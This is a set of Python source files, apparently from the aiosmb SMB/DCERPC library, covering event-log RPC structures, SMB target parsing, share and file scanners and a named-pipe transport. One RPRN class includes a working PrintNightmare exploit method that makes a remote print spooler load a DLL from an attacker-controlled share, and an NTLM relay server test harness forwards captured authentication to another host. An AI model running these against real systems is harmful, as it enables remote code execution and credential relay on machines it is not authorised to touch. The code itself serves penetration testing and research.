		('Error', RPC_INFO),
		)

class EvtRpcQueryNext(NDRCALL):
	opnum = 11
	structure = (
		('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
		('NumRequestedRecords', DWORD),
		('TimeOutEnd', DWORD),
		('Flags', DWORD),
	)

class EvtRpcQueryNextResponse(NDRCALL):
	structure = (
		('NumActualRecords', DWORD),
		('EventDataIndices', DWORD_ARRAY),
		('EventDataSizes', DWORD_ARRAY),
		('ResultBufferSize', DWORD),
		('ResultBuffer', BYTE_ARRAY),
		('ErrorCode', ULONG),
	)

class EvtRpcQuerySeek(NDRCALL):
	opnum = 12
	structure = (
		('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
		('Pos', LARGE_INTEGER),
		('BookmarkXML', LPWSTR),
		('Flags', DWORD),
	)

class EvtRpcQuerySeekResponse(NDRCALL):
	structure = (
		('Error', RPC_INFO),
	)

class EvtRpcClose(NDRCALL):
	opnum = 13
	structure = (
		("Handle", CONTEXT_HANDLE_LOG_HANDLE),
	)

class EvtRpcCloseResponse(NDRCALL):
	structure = (
		("Handle", PCONTEXT_HANDLE_LOG_HANDLE),
		('ErrorCode', ULONG),
	)

class EvtRpcOpenLogHandle(NDRCALL):
	opnum = 17
	structure = (
		('Channel', WSTR),
		('Flags', DWORD),
	)

class EvtRpcOpenLogHandleResponse(NDRCALL):
	structure = (
		('Handle', PCONTEXT_HANDLE_LOG_HANDLE),
		('Error', RPC_INFO),
	)

class EvtRpcGetChannelList(NDRCALL):
	opnum = 19
	structure = (
		('Flags', DWORD),
	)

class EvtRpcGetChannelListResponse(NDRCALL):
	structure = (
		('NumChannelPaths', DWORD),
		('ChannelPaths', PLPWSTR_ARRAY),
		('ErrorCode', ULONG),
	)

################################################################################
# OPNUMs and their corresponding structures
################################################################################

OPNUMS = {
	5   : (EvtRpcRegisterLogQuery, EvtRpcRegisterLogQueryResponse),
	11  : (EvtRpcQueryNext,  EvtRpcQueryNextResponse),
	12  : (EvtRpcQuerySeek, EvtRpcQuerySeekResponse),
	13  : (EvtRpcClose, EvtRpcCloseResponse),
	17  : (EvtRpcOpenLogHandle, EvtRpcOpenLogHandle),
	19  : (EvtRpcGetChannelList, EvtRpcGetChannelListResponse),
}

################################################################################
# HELPER FUNCTIONS
################################################################################

async def hEvtRpcRegisterLogQuery(dce, path, flags, query='*\x00'):
	request = EvtRpcRegisterLogQuery()

	request['Path'] = path
	request['Query'] = query
	request['Flags'] = flags
	resp = dce.request(request)
	return await resp

async def hEvtRpcQueryNext(dce, handle, numRequestedRecords, timeOutEnd=1000):
	request = EvtRpcQueryNext()

	request['LogQuery'] = handle
	request['NumRequestedRecords'] = numRequestedRecords
	request['TimeOutEnd'] = timeOutEnd
	request['Flags'] = 0
	return  await dce.request(request)

	#status = system_errors.ERROR_MORE_DATA
	#resp, err = await dce.request(request)
	#if err is not None:
	#	try:
	#		resp = await dce.request(request)
	#	except DCERPCException as e:
	#		if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
	#			raise
	#		elif str(e).find('ERROR_TIMEOUT') < 0:
	#			raise
	#		resp = e.get_packet()
	#	return resp

async def hEvtRpcClose(dce, handle):
	request = EvtRpcClose()
	request['Handle'] = handle
	resp = dce.request(request)
	return await resp

async def hEvtRpcOpenLogHandle(dce, channel, flags):
	request = EvtRpcOpenLogHandle()

	request['Channel'] = channel
	request['Flags'] = flags
	return await dce.request(request)

async def hEvtRpcGetChannelList(dce):
	request = EvtRpcGetChannelList()
	request['Flags'] = 0
	return await dce.request(request)





from asysocks.unicomm.common.scanner.common import *
from aiosmb.commons.connection.factory import SMBConnectionFactory
from asyauth.protocols.ntlm.structures.serverinfo import NTLMSERVERINFO_TSV_HDR, NTLMServerInfo

class SMBFingerRes:
	def __init__(self, res:NTLMServerInfo):
		self.res = res

	def get_header(self):
		return NTLMSERVERINFO_TSV_HDR

	def to_json(self):
		return self.res.to_json()

	def to_line(self, separator = '\t'):
		return self.res.to_tsv(separator)

class SMBFingerScanner:
	def __init__(self, factory:SMBConnectionFactory):
		self.factory:SMBConnectionFactory = factory

	async def run(self, targetid, target, out_queue):
		try:
			connection = self.factory.create_connection_newtarget(target)
			res, err = await connection.fake_login()
			if err is not None:
				raise err
			
			await out_queue.put(ScannerData(target, SMBFingerRes(res)))
		except Exception as e:
			await out_queue.put(ScannerError(target, e))



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
# Comments:
#


import ipaddress
import enum
import copy
from urllib.parse import urlparse, parse_qs
from typing import List
from asysocks.unicomm.utils.paramprocessor import str_one, int_one, bool_one

from asysocks.unicomm.common.target import UniTarget, UniProto
from asysocks.unicomm.common.proxy import UniProxyProto, UniProxyTarget

from aiosmb.protocol.common import NegotiateDialects, SMB2_NEGOTIATE_DIALTECTS_2, SMB2_NEGOTIATE_DIALTECTS_3, SMB2_NEGOTIATE_DIALTECTS

class SMBConnectionDialect(enum.Enum):
	SMB = 'SMB' #any, will us a wildcard because SMB1 is not implremented
	SMB2 = 'SMB2' #will offer all v2 versions
	SMB3 = 'SMB3' #will offer all v3 versions
	SMB202 = 'SMB202'
	SMB210 = 'SMB210'
	#SMB222 = 'SMB222'
	#SMB224 = 'SMB224'
	SMB300 = 'SMB300'
	SMB302 = 'SMB302'
	#SMB310 = 'SMB310'
	SMB311 = 'SMB311'

smb_negotiate_dialect_lookup = {
	SMBConnectionDialect.SMB202 : NegotiateDialects.SMB202,
	SMBConnectionDialect.SMB210 : NegotiateDialects.SMB210,
	#SMBConnectionDialect.SMB222 : NegotiateDialects.SMB222,
	#SMBConnectionDialect.SMB224 : NegotiateDialects.SMB224,
	SMBConnectionDialect.SMB300 : NegotiateDialects.SMB300,
	SMBConnectionDialect.SMB302 : NegotiateDialects.SMB302,
	#SMBConnectionDialect.SMB310 : NegotiateDialects.SMB310,
	SMBConnectionDialect.SMB311 : NegotiateDialects.SMB311,
}

smburlconnection_param2var = {
	'TCP' : UniProto.CLIENT_TCP,
	'UDP' : UniProto.CLIENT_UDP,
	'QUIC' : UniProto.CLIENT_QUIC,
}

smbtarget_url_params = {
	'fragment' : int_one,
	'compress' : int_one,
}

class SMBTarget(UniTarget):
	"""
	"""
	def __init__(self, ip:str = None, 
						port:int = 445, 
						hostname:str = None, 
						timeout:int = 5, 
						dc_ip:str =None, 
						domain:str = None, 
						proxies:List[UniProxyTarget] = None,
						protocol:UniProto = UniProto.CLIENT_TCP,
						dns:str = None,
						path:str = None,
						compression:bool = False,
						fragment:int = None):
		UniTarget.__init__(self, ip, port, protocol, timeout, hostname = hostname, proxies = proxies, domain = domain, dc_ip = dc_ip, dns=dns)
		
		self.path:str = path #for holding remote file path
		self.preferred_dialects:SMBConnectionDialect = SMB2_NEGOTIATE_DIALTECTS_2
		self.fragment = fragment
		self.compression:bool = compression
		
		#this is mostly for advanced users
		self.MaxTransactSize:int = 0x100000
		self.MaxReadSize:int = 0x100000
		self.MaxWriteSize:int = 0x100000
		self.PendingTimeout:int = 5
		self.PendingMaxRenewal:int = None

		self.calc_fragment()
		
	def calc_fragment(self):
		if self.fragment is not None:
			fs = 0x100000
			if self.fragment == 5:
				fs = 5*1024
			elif self.fragment == 4:
				fs = 7*1024
			elif self.fragment == 3:
				fs = 10*1024
			elif self.fragment == 2:
				fs = 500*1024
			elif self.fragment == 1:
				fs = 5000*1024
			
			self.MaxTransactSize = fs
			self.MaxReadSize = fs
			self.MaxWriteSize = fs


	def update_dialect(self, dialect:SMBConnectionDialect) -> None: 
		if isinstance(dialect, SMBConnectionDialect) is False:
			raise Exception('dialect must be a type of SMBConnectionDialect')
		if dialect == SMBConnectionDialect.SMB:
			self.preferred_dialects = SMB2_NEGOTIATE_DIALTECTS
			self.preferred_dialects[NegotiateDialects.WILDCARD] = 1
		elif dialect == SMBConnectionDialect.SMB2:
			self.preferred_dialects = SMB2_NEGOTIATE_DIALTECTS_2
		elif dialect == SMBConnectionDialect.SMB3:
			self.preferred_dialects = SMB2_NEGOTIATE_DIALTECTS_3
			
		else:
			self.preferred_dialects = {
				smb_negotiate_dialect_lookup[dialect] : 1,
				NegotiateDialects.WILDCARD : 1,
			}
		return

	def to_target_string(self) -> str:
		return 'cifs/%s@%s' % (self.hostname, self.domain)

	def get_copy(self, ip, port, hostname = None):
		t = SMBTarget(
			ip = ip, 
			port = port, 
			hostname = hostname, 
			timeout = self.timeout, 
			dc_ip= self.dc_ip, 
			domain = self.domain, 
			proxies = copy.deepcopy(self.proxies),
			protocol = self.protocol
		)

		t.MaxTransactSize = self.MaxTransactSize
		t.MaxReadSize = self.MaxReadSize
		t.MaxWriteSize = self.MaxWriteSize
		t.PendingTimeout = self.PendingTimeout
		t.PendingMaxRenewal = self.PendingMaxRenewal

		return t
	
	@staticmethod
	def from_url(connection_url):
		url_e = urlparse(connection_url)
		schemes = url_e.scheme.upper().split('+')
		connection_tags = schemes[0].split('-')
		if len(connection_tags) > 1:
			dialect = SMBConnectionDialect(connection_tags[0])
			protocol = smburlconnection_param2var[connection_tags[1]]
		else:
			dialect = SMBConnectionDialect(connection_tags[0])
			protocol = UniProto.CLIENT_TCP
		
		if url_e.port:
			port = url_e.port
		elif protocol == UniProto.CLIENT_TCP:
			port = 445
		elif protocol == UniProto.CLIENT_QUIC:
			port = 443
		else:
			raise Exception('Port must be provided!')
		
		path = None
		if url_e.path not in ['/', '', None]:
			path = url_e.path
		
		unitarget, extraparams = UniTarget.from_url(connection_url, protocol, port, smbtarget_url_params)
		compression = extraparams.get('compress', False)

		target = SMBTarget(
			ip = unitarget.ip,
			port = unitarget.port,
			hostname = unitarget.hostname,
			timeout = unitarget.timeout,
			dc_ip = unitarget.dc_ip,
			domain = unitarget.domain,
			proxies = unitarget.proxies,
			protocol = unitarget.protocol,
			dns = unitarget.dns,
			path = path,
			compression=compression,
			fragment = extraparams.get('fragment')
		)
		target.update_dialect(dialect)
		return target



	
	@staticmethod
	def from_connection_string(s):
		port = 445
		dc = None
		
		_, target = s.rsplit('@', 1)
		if target.find('/') != -1:
			target, dc = target.split('/')
			
		if target.find(':') != -1:
			target, port = target.split(':')
			
		st = SMBTarget()
		st.port = port
		st.dc_ip = dc
		st.domain, _ = s.split('/', 1)
		
		try:
			st.ip = str(ipaddress.ip_address(target))
		except:
			st.hostname = target
	
		return st
		
	def __str__(self):
		t = '==== SMBTarget ====\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for x in self.__dict__[k]:
					t += '    %s: %s\r\n' % (k, x)
			else:
				t += '%s: %s\r\n' % (k, self.__dict__[k])
			
		return t
		
		
def test():
	s = 'TEST/victim/ntlm/nt:AAAAAAAA@10.10.10.2:445'
	creds = SMBTarget.from_connection_string(s)
	print(str(creds))
	
	s = 'TEST/victim/sspi@10.10.10.2:445/aaaa'
	creds = SMBTarget.from_connection_string(s)
	
	print(str(creds))
	
if __name__ == '__main__':
	test()



import io


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even6/762528ba-f36a-4d17-ba2b-0f0244a45f2f
class RESULT_SET:
	def __init__(self):
		self.totalSize = None
		self.headerSize = None
		self.eventOffset = None
		self.bookmarkOffset = None
		self.binXmlSize = None
		self.eventData = None
		self.numberOfSubqueryIDs = None
		self.subqueryIDs = None
		self.bookMarkData = None
	
	@staticmethod
	def from_bytes(data):
		return RESULT_SET.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		r = RESULT_SET()
		pos = buff.tell()
		r.totalSize = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		pos += r.totalSize
		r.headerSize = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		r.eventOffset = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		r.bookmarkOffset = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		r.binXmlSize = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		r.eventData = buff.read(r.binXmlSize)
		r.numberOfSubqueryIDs = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		r.subqueryIDs = buff.read(r.numberOfSubqueryIDs)
		r.bookMarkData = buff.read(pos - buff.tell())
		return r


import traceback
import asyncio
from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5 import rprn
from aiosmb import logger
from aiosmb.dcerpc.v5.dtypes import NULL
import pathlib
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE

class RPRNRPC:
	def __init__(self):
		self.service_pipename = r'\spoolss'
		self.service_uuid = rprn.MSRPC_UUID_RPRN
		self.dce = None
		#self.handle = None
		
		self.handle_ctr = 0
		self.printer_handles = {}
		
	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = RPRNRPC()
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P 
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(service.service_uuid)
			if err is not None:
				raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			if auth_level is None:
				#for SMB connection no extra auth needed
				auth_level = RPC_C_AUTHN_LEVEL_NONE
			rpctransport = SMBDCEFactory(connection, filename=RPRNRPC().service_pipename)		
			service, err = await RPRNRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
	
	async def close(self):
		try:
			if self.dce:
				try:
					await self.dce.disconnect()
				except:
					pass
				return
			
			return True,None
		except Exception as e:
			return None, e
	
	async def open_printer(self, printerName, pDatatype = NULL, pDevModeContainer = NULL, accessRequired = rprn.SERVER_READ):
		try:
			resp, err = await rprn.hRpcOpenPrinter(self.dce, printerName, pDatatype, pDevModeContainer, accessRequired)
			if err is not None:
				raise err
			handle_no = self.handle_ctr
			self.handle_ctr += 1
			self.printer_handles[handle_no] = resp['pHandle']

			return handle_no, None
		except Exception as e:
			return None, e

	async def hRpcRemoteFindFirstPrinterChangeNotificationEx(self, handle, fdwFlags, fdwOptions=0, pszLocalMachine=NULL, dwPrinterLocal=0, pOptions=NULL):
		try:
			handle = self.printer_handles[handle]
			resp, err = await rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(
				self.dce, 
				handle, 
				fdwFlags, 
				fdwOptions=fdwOptions,
				pszLocalMachine=pszLocalMachine,
				dwPrinterLocal=dwPrinterLocal, 
				pOptions=pOptions
			)
			if err is not None:
				raise err

			return resp, None
		except Exception as e:
			return None, e
	
	async def enum_drivers(self, environments, level = 2, name = ''):
		try:
			if environments[-1] != '\x00':
				environments += '\x00'
			drivers, err = await rprn.hRpcEnumPrinterDrivers(self.dce, name, environments, level)
			if err is not None:
				return None, err
			return drivers, None
		except Exception as e:
			return None, e
	
	async def get_driverpath(self, environments = "Windows x64"):
		try:
			drivers, err = await self.enum_drivers(environments, level = 2)
			if err is not None:
				return None, err
			
			for driver in drivers:
				DriverPath = str(pathlib.PureWindowsPath(driver.DriverPath).parent) + '\\UNIDRV.DLL'
				if "FileRepository" in DriverPath:
					return DriverPath, None

			return None, Exception('Failed to obtain driverpath')
		except Exception as e:
			return None, e


	async def printnightmare(self, share, driverpath = None, handle=NULL, environments = "Windows x64", name = "1234", silent = False):
		try:
			# share needs to be in UNC format! (\\\\10.0.0.1\\share\\...)
			if driverpath is None:
				driverpath, err = await self.get_driverpath(environments = environments)
				if err is not None:
					return None, err
			if driverpath[-1] != '\x00':
				driverpath += '\x00'
			if environments[-1] != '\x00':
				environments += '\x00'
			if name[-1] != '\x00':
				name += '\x00'
			if share[-1] != '\x00':
				share += '\x00'

			container_info = rprn.DRIVER_CONTAINER()
			container_info['Level'] = 2
			container_info['DriverInfo']['tag'] = 2
			container_info['DriverInfo']['Level2']['cVersion']     = 3
			container_info['DriverInfo']['Level2']['pName']        = name
			container_info['DriverInfo']['Level2']['pEnvironment'] = environments
			container_info['DriverInfo']['Level2']['pDriverPath']  = driverpath
			container_info['DriverInfo']['Level2']['pDataFile']    = share
			container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\winhttp.dll\x00"

			flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
			filename = share.split("\\")[-1]

			#### Triggering the download of the evil DLL
			resp, err = await rprn.hRpcAddPrinterDriverEx(self.dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
			if err is not None:
				raise err
			if silent is False:
				print("[*] Stage 0: {0}".format(resp['ErrorCode']))

			#### Triggering a change in the new printer's config which automatically creates a backup of the evil DLL
			container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
			resp, err = await rprn.hRpcAddPrinterDriverEx(self.dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
			if err is not None:
				raise err
			if silent is False:
				print("[*] Stage 1: {0}".format(resp['ErrorCode']))

			##### Triggering the DLL load of the backup version of evil DLL. We first need to find the correct directory...
			for i in range(1, 30):
				try:
					container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
					resp, err = await rprn.hRpcAddPrinterDriverEx(self.dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
					if err is not None:
						raise err
					if silent is False:
						print("[*] Stage %s: %s" % (i+1, resp['ErrorCode']))
					if (resp['ErrorCode'] == 0):
						if silent is False:
							print("[+] Exploit Completed")
						return True, None
				except Exception as e:
					if silent is False:
						print("[*] Stage %s: %s" % (i+1, e))
					continue

			return False, None
		except Exception as e:
			if silent is False:
				traceback.print_exc()
			return None, e



from asysocks.unicomm.common.scanner.common import *
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine


class SMBFileRes:
	def __init__(self, obj, otype, err):
		self.obj = obj
		self.otype = otype
		self.err = err

	# https://stackoverflow.com/questions/1094841/get-human-readable-version-of-file-size
	@staticmethod
	def sizeof_fmt(num, suffix='B'):
		if num is None:
			return ''
		for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
			if abs(num) < 1024.0:
				return "%3.1f%s%s" % (num, unit, suffix)
			num /= 1024.0
		return "%.1f%s%s" % (num, 'Yi', suffix)

	def get_header(self):
		return ['otype', 'path', 'creationtime', 'size', 'sizefmt', 'sddl']

	def to_line(self, separator = '\t'):
		if self.err is not None:
			unc_path = ''
			try:
				unc_path = str(self.obj.unc_path)
			except:
				pass
			return separator.join([
				'err',
				unc_path,
				str(self.err)
			])

		unc_path = ''
		creationtime = ''
		size = ''
		sizefmt = ''
		security_descriptor_sddl = ''
		if self.otype in ['dir', 'file', 'share']:
			unc_path = str(self.obj.unc_path)
			if self.otype == 'dir' or self.otype == 'file' or self.otype == 'share':
				if self.otype == 'dir' or self.otype == 'file':
					if self.obj.creation_time is not None:
						creationtime = self.obj.creation_time.isoformat()
				security_descriptor = self.obj.security_descriptor
				security_descriptor_sddl = '' if security_descriptor is None else str(security_descriptor.to_sddl())
			
			if self.otype == 'file':
				size = self.obj.size
				sizefmt = SMBFileRes.sizeof_fmt(size)

		if self.otype == 'file':
			return separator.join([
				'file',
				unc_path,
				creationtime,
				str(size), 
				sizefmt,
				security_descriptor_sddl,
			])
		if self.otype == 'dir':
			return separator.join([
				'dir',
				unc_path, 
				creationtime, 
				security_descriptor_sddl
			])
		if self.otype == 'share':
			return separator.join([
				'share',
				unc_path,
				security_descriptor_sddl
			])

class SMBFileScanner:
	def __init__(self, 
			factory:SMBConnectionFactory, 
			depth = 3,
			max_items = None, 
			fetch_share_sd = False, 
			fetch_dir_sd=False, 
			fetch_file_sd = False,
			exclude_share = [],
			exclude_dir = []
			):
		
		self.factory = factory
		self.depth = depth 
		self.maxentries = max_items
		self.fetch_share_sd= fetch_share_sd 
		self.fetch_dir_sd = fetch_dir_sd
		self.fetch_file_sd = fetch_file_sd 
		self.exclude_share = exclude_share 
		self.exclude_dir = exclude_dir

	async def run(self, targetid, target, out_queue):
		try:
			connection = self.factory.create_connection_newtarget(target)
			async with connection:
				_, err = await connection.login()
				if err is not None:
					raise err

				machine = SMBMachine(connection)
				async for obj, otype, err in machine.enum_all_recursively(
						depth = self.depth, 
						maxentries = self.maxentries, 
						fetch_share_sd= self.fetch_share_sd, 
						fetch_dir_sd = self.fetch_dir_sd, 
						fetch_file_sd = self.fetch_file_sd, 
						exclude_share = self.exclude_share, 
						exclude_dir = self.exclude_dir):

					await out_queue.put(ScannerData(target, SMBFileRes(obj, otype, err)))

		except Exception as e:
			await out_queue.put(ScannerError(target, e))



from asysocks.unicomm.common.target import UniTarget, UniProto
from asysocks.unicomm.server import UniServer
from aiosmb.transport.netbios import NetBIOSPacketizer
from aiosmb.protocol.smb2.commands.negotiate import NEGOTIATE_REQ, NEGOTIATE_REPLY,NegotiateSecurityMode, NegotiateCapabilities, NegotiateDialects
from aiosmb.wintypes.dtyp.constrcuted_security.guid import *
from aiosmb.relay.serverconnection import SMBRelayServerConnection
from asyauth.protocols.spnego.relay.native import spnegorelay_ntlm_factory
from asyauth.protocols.ntlm.relay.native import NTLMRelaySettings, ntlmrelay_factory
import traceback
import asyncio

class SMBServerSettings:
	def __init__(self, gssapi_factory):
		self.gssapi_factory = gssapi_factory
		self.preferred_dialects = [NegotiateDialects.SMB202]
		self.MaxTransactSize = 0x100000
		self.MaxReadSize = 0x100000
		self.MaxWriteSize = 0x100000
		self.ServerGuid = GUID.random()
		self.RequireSigning = False

		self.shares = {} #share_name -> path on disk
	
	@property
	def gssapi(self):
		return self.gssapi_factory()
	

class SMBRelayServer:
	def __init__(self, target, settings):
		self.target = target
		self.settings = settings
		self.server = None
		self.serving_task = None
		self.connections = {}

	async def __handle_connection(self):
		try:
			async for connection in self.server.serve():
				print('connection in!')
				
				smbconnection = SMBRelayServerConnection(self.settings, connection)
				self.connections[self.settings.ServerGuid] = smbconnection
				await smbconnection.run()

		except Exception as e:
			traceback.print_exc()
			return

	async def run(self):
		self.server = UniServer(self.target, NetBIOSPacketizer())
		self.serving_task = asyncio.create_task(self.__handle_connection())
		return self.serving_task

async def test_relay_queue(rq):
	try:
		from aiosmb.connection import SMBConnection
		from aiosmb.commons.connection.target import SMBTarget
		from aiosmb.commons.interfaces.machine import SMBMachine
		test_target = SMBTarget('10.10.10.2')
		while True:
			item = await rq.get()
			print(item)
			connection = SMBConnection(item, test_target, preserve_gssapi=False, nosign=True)
			_, err = await connection.login()
			if err is not None:
				print('SMB client login err: %s' % err)
				print(traceback.format_tb(err.__traceback__))
				continue
			machine = SMBMachine(connection)
			async for share, err in machine.list_shares():
				if err is not None:
					print('SMB client list_shares err: %s' % err)
					continue
				print(share)

	except Exception as e:
		traceback.print_exc()
		return

async def amain():
	try:
		auth_relay_queue = asyncio.Queue()
		x = asyncio.create_task(test_relay_queue(auth_relay_queue))
		target = UniTarget('0.0.0.0', 445, UniProto.SERVER_TCP)

		settings = SMBServerSettings(lambda: spnegorelay_ntlm_factory(auth_relay_queue, lambda: ntlmrelay_factory()))
		settings.preferred_dialects = [NegotiateDialects.SMB202]
		settings.MaxTransactSize = 0x100000
		settings.MaxReadSize = 0x100000
		settings.MaxWriteSize = 0x100000
		settings.ServerGuid = GUID.random()
		settings.RequireSigning = False
		settings.shares = {} #share_name -> path on disk

		server = SMBRelayServer(target, settings)
		server_task = await server.run()
		await server_task
	except Exception as e:
		traceback.print_exc()
		return
if __name__ == '__main__':
	asyncio.run(amain())




from aiosmb.commons.interfaces.file import SMBFile
from aiosmb.dcerpc.v5.rpcrt import MSRPCRespHeader

class DCERPCSMBTransport:
	def __init__(self, target):
		self.target = target
		self.smbfile = None
		
		self._max_send_frag = None

	def get_session_key(self):
		return self.target.smb_connection.get_session_key()
	
	async def connect(self):
		# TODO: if the smb connection is not set up, we need to set it up
		try:
			unc_path = '\\\\%s\\%s%s' % (self.target.smb_connection.target.get_hostname_or_ip(), 'IPC$', self.target.pipe)
			self.smbfile = SMBFile.from_uncpath(unc_path)
			_, err = await self.smbfile.open(self.target.smb_connection, 'wp')
			return True, err
		except Exception as e:
			return None, e

	async def disconnect(self):
		try:
			await self.smbfile.close()
		except Exception as e:
			return None, e
	
	async def send(self, data, forceWriteAndx = 0, forceRecv = 0):
		try:
			if self._max_send_frag:
				offset = 0
				while 1:
					toSend = data[offset:offset+self._max_send_frag]
					if not toSend:
						break
					total_writen, err = await self.smbfile.write(toSend)
					if err is not None:
						raise err
					offset += len(toSend)
					
			else:
				total_writen, err = await self.smbfile.write(data)
				if err is not None:
					raise err
			
			return True, None
		except Exception as e:
			return None, e

	# old
	#async def recv(self, count): #async def recv(self, forceRecv = 0, count = 0):
	#	try:
	#		#print(count)
	#		data, err = await self.smbfile.read(count)
	#		#print('recv %s' % repr(data))
	#		return data, err
	#	except Exception as e:
	#		return None, e

	async def recv(self, count):
		try:
			hdr_data, err = await self.smbfile.read(24)
			if err is not None:
				raise err
			response_header = MSRPCRespHeader(hdr_data)

			msg_data, err = await self.smbfile.read(response_header['frag_len'])
			if err is not None:
				raise err

			return hdr_data+msg_data, None
		except Exception as e:
			return None, e